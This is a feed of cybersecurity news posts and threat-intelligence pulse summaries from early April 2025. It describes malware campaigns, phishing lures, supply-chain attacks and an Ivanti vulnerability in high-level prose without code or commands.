Beware of Weaponized Recruitment Emails that Deliver BeaverTail and Tropidoor Malware https://cybersecuritynews.com/beware-of-weaponized-recruitment-emails/ #CyberSecurityNews #cybersecuritynews #Threats #malware
US, Allies Warn of Threat Actors Using ‘Fast Flux’ to Hide Server Locations – Source: www.securityweek.com https://ciso2ciso.com/us-allies-warn-of-threat-actors-using-fast-flux-to-hide-server-locations-source-www-securityweek-com/ #rssfeedpostgeneratorecho #CyberSecurityNews #Malware&Threats #securityweekcom #securityweek #fastflux #guidance #CISA #DNS
Sophisticated Malware Campaign Targeting Job Seekers
Pulse ID: 67f0999050802d6d044741a2
Pulse Link: https://otx.alienvault.com/pulse/67f0999050802d6d044741a2
Pulse Author: cryptocti
Created: 2025-04-05 02:46:40
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Beware! Weaponized Job Recruitment Emails Spreading BeaverTail and Tropidoor Malware https://gbhackers.com/beware-weaponized-job-recruitment-emails/ #CyberSecurityNews #cybersecurity #Malware #Email
Beware of Clickfix: ‘Fix Now’ and ‘Bot Verification’ Lures Deliver and Execute Malware https://gbhackers.com/beware-of-clickfix-fix-now-and-bot-verification/ #CyberSecurityNews #cybersecurity #PowerShell #Malware
DeepSeek-R1 Prompts Abused to Generate Advanced Malware and Phishing Sites https://gbhackers.com/deepseek-r1-prompts-abused-to-generate-advanced-malware/ #CyberSecurityNews #cybersecurity #DeepSeek #Phishing #Malware
Typosquatted Go Packages Deliver Malware Loader Targeting Li...
A malicious campaign is targeting the Go ecosystem with typosquatted packages that install hidden loader malware on Linux and macOS systems. The threat actor has published at least seven packages impersonating popular Go libraries, using array-based string obfuscation to hide malicious commands. The packages download and execute remote scripts that install an ELF file named f0eee999, which exhibits minimal initial malicious behavior. The campaign specifically targets UNIX-like environments, placing developers at risk. Multiple domains and fallback infrastructure suggest a persistent and adaptable threat actor. Developers are advised to implement real-time scanning tools, code audits, and careful dependency management to mitigate the risk of supply chain compromises.
Pulse ID: 67efc6e6d18160ba914fc662
Pulse Link: https://otx.alienvault.com/pulse/67efc6e6d18160ba914fc662
Pulse Author: AlienVault
Created: 2025-04-04 11:47:50
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Deobfuscating APT28's HTA Trojan: A Deep Dive into VBE Techniques & Multi-Layer Obfuscation
This analysis delves into APT28's cyber espionage campaign targeting Central Asia and Kazakhstan diplomatic relations, focusing on their HTA Trojan. The malware employs advanced obfuscation techniques, including VBE (VBScript Encoded) and multi-layer obfuscation. The investigation uses x32dbg debugging to decode the obfuscated code, revealing a custom map algorithm for character deobfuscation. The process involves decoding strings using embedded characters from Windows vbscript.dll. The analysis identifies the use of Microsoft's Windows Script Encoder (screnc.exe) to create VBE files. By employing various deobfuscation techniques, including a Python script, the final malware sample is extracted and analyzed, showcasing APT28's evolving tactics in cyber espionage.
Pulse ID: 67efc6e712b49d46c1423ca9
Pulse Link: https://otx.alienvault.com/pulse/67efc6e712b49d46c1423ca9
Pulse Author: AlienVault
Created: 2025-04-04 11:47:51
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Silent Credit Card Thief Uncovered
A sophisticated credit card skimming campaign dubbed 'RolandSkimmer' has been discovered, targeting users in Bulgaria. The attack utilizes malicious browser extensions across Chrome, Edge, and Firefox, initiated through a deceptive LNK file. The malware employs obfuscated scripts to establish persistent access, harvesting and exfiltrating sensitive financial data. The attack workflow involves system reconnaissance, downloading additional malicious files, and injecting scripts into web pages. The threat actor uses unique identifiers to track victims and employs sophisticated techniques to evade detection. The campaign demonstrates the evolving nature of web-based credit card skimming threats, highlighting the need for enhanced security measures against LNK-based attacks and unverified browser extensions.
Pulse ID: 67efc6e92fbd533808f09435
Pulse Link: https://otx.alienvault.com/pulse/67efc6e92fbd533808f09435
Pulse Author: AlienVault
Created: 2025-04-04 11:47:53
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Russian-Speaking Threat Actor Abuses Cloudflare & Telegram in Phishing Campaign
A Russian-speaking threat actor has launched a new phishing campaign using Cloudflare-branded pages themed around DMCA takedown notices. The attack abuses the ms-search protocol to deliver malicious LNK files disguised as PDFs. Once executed, the malware communicates with a Telegram bot to report the victim's IP address before connecting to Pyramid C2 servers. The campaign leverages Cloudflare Pages and Workers services to host phishing pages, and uses an open directory to store malicious files. The infection chain includes PowerShell and Python scripts, with incremental changes in tactics to evade detection. The actors' infrastructure spans multiple domains and IP addresses, primarily using Cloudflare's network.
Pulse ID: 67efc6ed5285702a3440969a
Pulse Link: https://otx.alienvault.com/pulse/67efc6ed5285702a3440969a
Pulse Author: AlienVault
Created: 2025-04-04 11:47:57
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Where to Find Aspiring Hackers
This analysis delves into Proton66, a bulletproof hosting network enabling cybercrime operations and serving as a hub for aspiring cybercriminals. It focuses on a threat actor known as 'Coquettte' and their ties to the Horrid hacking group, a loosely organized cybercriminal collective. The investigation reveals a fake cybersecurity website, cybersecureprotect[.]com, which exposed its malicious infrastructure due to an OPSEC failure. Coquettte's activities include distributing malware, keyloggers, and trojans through Proton66's infrastructure. The research also uncovers other projects operated by this actor, including a website hosting guides for illegal activities. The analysis provides technical details of Coquettte's malware infrastructure and explores Proton66's role as a breeding ground for amateur threat actors.
Pulse ID: 67efe859080e7d3823c1d41e
Pulse Link: https://otx.alienvault.com/pulse/67efe859080e7d3823c1d41e
Pulse Author: AlienVault
Created: 2025-04-04 14:10:33
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
APT Targets South Korea with Deceptive PDF Lures
The Kimsuky APT group, also known as Black Banshee, has been actively targeting South Korean government entities using evolving tactics. Two distinct campaigns were uncovered, both utilizing government-themed PDF documents as lures. The infection chain begins with a phishing email containing a malicious LNK file attachment, which drops an obfuscated VBA script. This script then deploys additional files, including a PDF and a ZIP containing malicious components. The attacks involve sophisticated techniques such as Base64 encoding, obfuscation, and VM-aware evasion. The malware's functionalities include data exfiltration, cryptocurrency wallet theft, browser data extraction, keylogging, and establishing C2 communication. The campaigns demonstrate the group's continuous efforts to compromise South Korean targets using deceptive tactics and multi-stage malware.
Pulse ID: 67efe85af4503af2018d414e
Pulse Link: https://otx.alienvault.com/pulse/67efe85af4503af2018d414e
Pulse Author: AlienVault
Created: 2025-04-04 14:10:34
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Cyberattacks by AI agents are coming
Agents could make it easier and cheaper for criminals to hack systems at scale. We need to be ready.
https://www.technologyreview.com/2025/04/04/1114228/cyberattacks-by-ai-agents-are-coming
Proofpoint: Call It What You Want: Threat Actor Delivers Highly Targeted Multistage Polyglot Malware https://www.proofpoint.com/us/blog/threat-insight/call-it-what-you-want-threat-actor-delivers-highly-targeted-multistage-polyglot @proofpoint #cybersecurity #Infosec #malware #phishing
Netskope: New Evasive Campaign Delivers LegionLoader via Fake CAPTCHA & CloudFlare Turnstile https://www.netskope.com/blog/new-evasive-campaign-delivers-legionloader-via-fake-captcha-cloudflare-turnstile #cybersecurity #infosec #Cloudflare #phishing #malware
Proactive ClickFix Threat Hunting with Hunt.io
ClickFix is a browser-based delivery technique that uses deceptive prompts and clipboard hijacking to trick users into executing malicious commands. Cybercriminals and advanced actors employ this method to deploy malware, primarily information stealers. The technique involves luring users with fake system alerts or CAPTCHA challenges, then silently staging payloads for execution. The article describes how Hunt.io's research team used custom queries to identify web infrastructure associated with ClickFix delivery, uncovering multiple live domains serving malicious content. Examples include a Bitcoin-themed domain posing as Cloudflare WAF to deliver Lumma and CryptBot malware, a page targeting Zoho Office Suite credentials, and a compromised website abusing PowerShell. The report emphasizes the growing traction of ClickFix as a low-friction method for malware delivery and credential harvesting.
Pulse ID: 67ef854620c41c3fd65378db
Pulse Link: https://otx.alienvault.com/pulse/67ef854620c41c3fd65378db
Pulse Author: AlienVault
Created: 2025-04-04 07:07:50
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457)
A critical security vulnerability, CVE-2025-22457, affecting Ivanti Connect Secure VPN appliances has been actively exploited since mid-March 2025. The vulnerability allows remote code execution through a buffer overflow. Two new malware families, TRAILBLAZE and BRUSHFIRE, have been deployed along with the previously known SPAWN ecosystem. The suspected China-nexus espionage actor UNC5221 is believed to be behind the attacks. Post-exploitation activities include the use of a shell script dropper, deployment of various malware components, and attempts to evade detection by modifying the Integrity Checker Tool. Organizations are urged to immediately patch their systems and monitor for suspicious activity.
Pulse ID: 67ef85475bfef03602225985
Pulse Link: https://otx.alienvault.com/pulse/67ef85475bfef03602225985
Pulse Author: AlienVault
Created: 2025-04-04 07:07:51
Be advised, this data is unverified and should be considered preliminary. Always do further verification.
Neue Malware "#CoffeeLoader" tarnt sich als ASUS-Software für Gaming-PCs. Besonders trickreich: Ein Teil des Schadcodes versteckt sich im Speicher der Grafikkarte. #ASUS #Malware https://winfuture.de/news,150116.html?utm_source=Mastodon&utm_medium=ManualStatus&utm_campaign=SocialMedia
North Korean threat actors are back - and scaling up. The #Lazarus Group is expanding its npm malware campaign with new RAT loaders, hex obfuscation, fresh aliases, and over 5,600 downloads across 11 packages.
Our latest research: https://socket.dev/blog/lazarus-expands-malicious-npm-campaign-11-new-packages-add-malware-loaders-and-bitbucket #JavaScript #malware
